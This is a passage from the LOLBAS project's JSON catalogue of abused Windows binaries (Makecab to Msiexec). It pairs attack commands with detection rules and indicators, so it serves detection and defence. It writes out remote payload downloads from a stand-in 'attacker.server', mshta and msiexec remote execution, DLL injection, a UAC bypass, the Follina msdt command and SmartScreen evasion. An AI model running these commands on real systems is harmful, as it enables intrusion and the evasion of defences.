development."}],"Resources":[{"Link":"https://twitter.com/DissectMalware/status/998797808907046913"},{"Link":"https://www.phpied.com/make-your-javascript-a-windows-exe/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Jsc/"},{"Name":"Ldifde.exe","Description":"Creates, modifies, and deletes LDAP directory objects.","Author":"Grzegorz Tworek","Created":"2022-08-31","Commands":[{"Command":"Ldifde -i -f inputfile.ldf","Description":"Import inputfile.ldf into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.","Usecase":"Download file from Internet","Category":"Download","Privileges":"Administrator","MitreID":"T1105","OperatingSystem":"Windows Server with AD Domain Services role, Windows 10 with AD LDS role."}],"Full_Path":[{"Path":"c:\\windows\\system32\\ldifde.exe"},{"Path":"c:\\windows\\syswow64\\ldifde.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1564968845726580736"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Ldifde/"},{"Name":"Makecab.exe","Description":"Binary to package existing files into a cabinet (.cab) file","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"makecab c:\\ADS\\autoruns.exe c:\\ADS\\cabtest.txt:autoruns.cab","Description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","Usecase":"Hide data compressed into an alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"makecab \\\\webdavserver\\webdav\\file.exe C:\\Folder\\file.txt:file.cab","Description":"Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","Usecase":"Hide data compressed into an alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"makecab \\\\webdavserver\\webdav\\file.exe C:\\Folder\\file.cab","Description":"Download and compresses the target file and stores it in the target file.","Usecase":"Download file and compress into a cab file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\makecab.exe"},{"Path":"C:\\Windows\\SysWOW64\\makecab.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"IOC":"Makecab retrieving files from Internet"},{"IOC":"Makecab storing data into alternate data streams"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Makecab/"},{"Name":"Mavinject.exe","Description":"Used by App-v in Windows","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"MavInject.exe 3110 /INJECTRUNNING c:\\folder\\evil.dll","Description":"Inject evil.dll into a process with PID 3110.","Usecase":"Inject dll file into running process","Category":"Execute","Privileges":"User","MitreID":"T1218.013","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"Mavinject.exe 4172 /INJECTRUNNING \"c:\\ads\\file.txt:file.dll\"","Description":"Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172","Usecase":"Inject dll file into running process","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\mavinject.exe"},{"Path":"C:\\Windows\\SysWOW64\\mavinject.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml"},{"IOC":"mavinject.exe should not run unless APP-v is in use on the workstation"}],"Resources":[{"Link":"https://twitter.com/gN3mes1s/status/941315826107510784"},{"Link":"https://twitter.com/Hexcorn/status/776122138063409152"},{"Link":"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"},{"Name":"Microsoft.Workflow.Compiler.exe","Description":"A utility included with .NET that is capable of compiling and executing C# or VB.net code.","Author":"Conor Richard","Created":"2018-10-22","Commands":[{"Command":"Microsoft.Workflow.Compiler.exe tests.xml results.xml","Description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.","Usecase":"Compile and run code","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10S, Windows 11"},{"Command":"Microsoft.Workflow.Compiler.exe tests.txt results.txt","Description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","Usecase":"Compile and run code","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10S, Windows 11"},{"Command":"Microsoft.Workflow.Compiler.exe tests.txt results.txt","Description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","Usecase":"Compile and run code","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10S, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"IOC":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"IOC":"Presence of \"<CompilerInput\" in a text file."}],"Resources":[{"Link":"https://twitter.com/mattifestation/status/1030445200475185154"},{"Link":"https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb"},{"Link":"https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1"},{"Link":"https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1"},{"Link":"https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks"},{"Link":"https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/"},{"Link":"https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"},{"Name":"Mmc.exe","Description":"Load snap-ins to locally and remotely manage Windows systems","Author":"@bohops","Created":"2018-12-04","Commands":[{"Command":"mmc.exe -Embedding c:\\path\\to\\test.msc","Description":"Launch a 'backgrounded' MMC process and invoke a COM payload","Usecase":"Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry","Category":"Execute","Privileges":"User","MitreID":"T1218.014","OperatingSystem":"Windows 10 (and possibly earlier versions), Windows 11"},{"Command":"mmc.exe gpedit.msc","Description":"Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.","Usecase":"Modify HKCU\\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.","Category":"UAC Bypass","Privileges":"Administrator","MitreID":"T1218.014","OperatingSystem":"Windows 10 (and possibly earlier versions), Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\mmc.exe"},{"Path":"C:\\Windows\\SysWOW64\\mmc.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"Resources":[{"Link":"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"},{"Link":"https://offsec.almond.consulting/UAC-bypass-dotnet.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Mmc/"},{"Name":"MpCmdRun.exe","Description":"Binary part of Windows Defender. Used to manage settings in Windows Defender","Author":"Oddvar Moe","Created":"2020-03-20","Commands":[{"Command":"MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\\\temp\\\\beacon.exe","Description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)","Usecase":"Download file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10"},{"Command":"copy \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\" C:\\Users\\Public\\Downloads\\MP.exe && chdir \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\\" && \"C:\\Users\\Public\\Downloads\\MP.exe\" -DownloadFile -url https://attacker.server/beacon.exe -path C:\\Users\\Public\\Downloads\\evil.exe","Description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]","Usecase":"Download file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10"},{"Command":"MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe","Description":"Download file to machine and store it in Alternate Data Stream","Usecase":"Hide downloaded data inton an Alternate Data Stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe"},{"Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe"},{"Path":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"IOC":"MpCmdRun storing data into alternate data streams."},{"IOC":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"IOC":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"IOC":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"IOC":"User Agent is \"MpCommunication\""}],"Resources":[{"Link":"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus"},{"Link":"https://twitter.com/mohammadaskar2/status/1301263551638761477"},{"Link":"https://twitter.com/Oddvarmoe/status/1301444858910052352"},{"Link":"https://twitter.com/NotMedic/status/1301506813242867720"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"},{"Name":"Msbuild.exe","Description":"Used to compile and execute code","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"msbuild.exe pshell.xml","Description":"Build and execute a C# project stored in the target XML file.","Usecase":"Compile and run code","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"msbuild.exe project.csproj","Description":"Build and execute a C# project stored in the target csproj file.","Usecase":"Compile and run code","Category":"Execute","Privileges":"User","MitreID":"T1127.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"msbuild.exe /logger:TargetLogger,C:\\Loggers\\TargetLogger.dll;MyParameters,Foo","Description":"Executes generated Logger DLL file with TargetLogger export","Usecase":"Execute DLL","Category":"Execute","Privileges":"User","MitreID":"T1127.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"msbuild.exe project.proj","Description":"Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.","Usecase":"Execute project file that contains XslTransformation tag parameters","Category":"Execute","Privileges":"User","MitreID":"T1127.001","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]},{"Command":"msbuild.exe @sample.rsp","Description":"By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.","Usecase":"Bypass command-line based detections","Category":"Execute","Privileges":"User","MitreID":"T1036","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe"},{"Path":"C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"Msbuild.exe should not normally be executed on workstations"}],"Resources":[{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"},{"Link":"https://github.com/Cn33liz/MSBuildShell"},{"Link":"https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191"},{"Link":"https://github.com/LOLBAS-Project/LOLBAS/issues/165"},{"Link":"https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files"},{"Link":"https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"},{"Name":"Msconfig.exe","Description":"MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Msconfig.exe -5","Description":"Executes command embeded in crafted c:\\windows\\system32\\mscfgtlc.xml.","Usecase":"Code execution using Msconfig.exe","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\msconfig.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml"},{"IOC":"mscfgtlc.xml changes in system32 folder"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/991314564896690177"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Msconfig/"},{"Name":"Msdt.exe","Description":"Microsoft diagnostics tool","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\PCW8E57.xml /skip TRUE","Description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.","Usecase":"Execute code","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Application":"GUI"}]},{"Command":"msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\PCW8E57.xml /skip TRUE","Description":"Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.","Usecase":"Execute code bypass Application whitelisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Application":"GUI"}]},{"Command":"msdt.exe /id PCWDiagnostic /skip force /param \"IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe\"","Description":"Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the \"PCWDiagnostic\" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","Usecase":"Execute code bypass Application allowlisting","Category":"AWL Bypass","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Application":"GUI"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Msdt.exe"},{"Path":"C:\\Windows\\SysWOW64\\Msdt.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"Resources":[{"Link":"https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/"},{"Link":"https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/"},{"Link":"https://twitter.com/harr0ey/status/991338229952598016"},{"Link":"https://twitter.com/nas_bench/status/1531944240271568896"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Msdt/"},{"Name":"Msedge.exe","Description":"Microsoft Edge browser","Author":"mr.d0x","Created":"2022-01-20","Commands":[{"Command":"msedge.exe https://example.com/file.exe.txt","Description":"Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.","Usecase":"Download file from the internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"},{"Command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"http://example.com/evil.b64.html\" > out.b64","Description":"Edge will silently download the file. File extension should be .html and binaries should be encoded.","Usecase":"Download file from the internet","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"},{"Command":"msedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c ping google.com &&\"","Description":"Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command","Usecase":"Executes a process under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"c:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"},{"Path":"c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml"}],"Resources":[{"Link":"https://twitter.com/mrd0x/status/1478116126005641220"},{"Link":"https://twitter.com/mrd0x/status/1478234484881436672"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Msedge/"},{"Name":"Mshta.exe","Description":"Used by Windows to execute html applications. (.hta)","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"mshta.exe evilfile.hta","Description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","Usecase":"Execute code","Category":"Execute","Privileges":"User","MitreID":"T1218.005","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"WSH"}]},{"Command":"mshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:https://webserver/payload.sct\"\")\"))","Description":"Executes VBScript supplied as a command line argument.","Usecase":"Execute code","Category":"Execute","Privileges":"User","MitreID":"T1218.005","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"mshta.exe javascript:a=GetObject(\"script:https://webserver/payload.sct\").Exec();close();","Description":"Executes JavaScript supplied as a command line argument.","Usecase":"Execute code","Category":"Execute","Privileges":"User","MitreID":"T1218.005","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"mshta.exe \"C:\\ads\\file.txt:file.hta\"","Description":"Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.","Usecase":"Execute code hidden in alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1218.005","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)","Tags":[{"Execute":"WSH"}]},{"Command":"mshta.exe https://example.com/payload","Description":"It will download a remote payload and place it in INetCache.","Usecase":"Downloads payload from remote server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\mshta.exe"},{"Path":"C:\\Windows\\SysWOW64\\mshta.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml"},{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"IOC":"mshta.exe executing raw or obfuscated script within the command-line"},{"IOC":"General usage of HTA file"},{"IOC":"msthta.exe network connection to Internet/WWW resource"},{"IOC":"DotNet CLR libraries loaded into mshta.exe"},{"IOC":"DotNet CLR Usage Log - mshta.exe.log"}],"Resources":[{"Link":"https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4"},{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct"},{"Link":"https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/"},{"Link":"https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Mshta/"},{"Name":"Msiexec.exe","Description":"Used by Windows to execute msi files","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"msiexec /quiet /i cmd.msi","Description":"Installs the target .MSI file silently.","Usecase":"Execute custom made msi file with attack code","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"msiexec /q /i http://192.168.100.3/tmp/cmd.png","Description":"Installs the target remote & renamed .MSI file silently.","Usecase":"Execute custom made msi file with attack code from remote server","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"msiexec /y 